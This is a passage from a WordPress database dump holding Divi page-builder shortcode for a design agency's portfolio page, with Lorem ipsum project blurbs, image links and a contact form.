button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 18:57:05','2020-08-08 18:57:05','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(673,1,'2020-08-08 18:58:48','2020-08-08 18:58:48','','Flyer Design-graphic design work','Flyer Design & Graphic Design Work','inherit','open','closed','','800x800-fl-copy-2','','','2021-03-18 06:35:07','2021-03-18 06:35:07','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg',0,'attachment','image/jpeg',0),(674,1,'2020-08-08 18:59:35','2020-08-08 18:59:35','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" title_text=\"Flyer Design-graphic design work\" alt=\"Flyer Design\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" 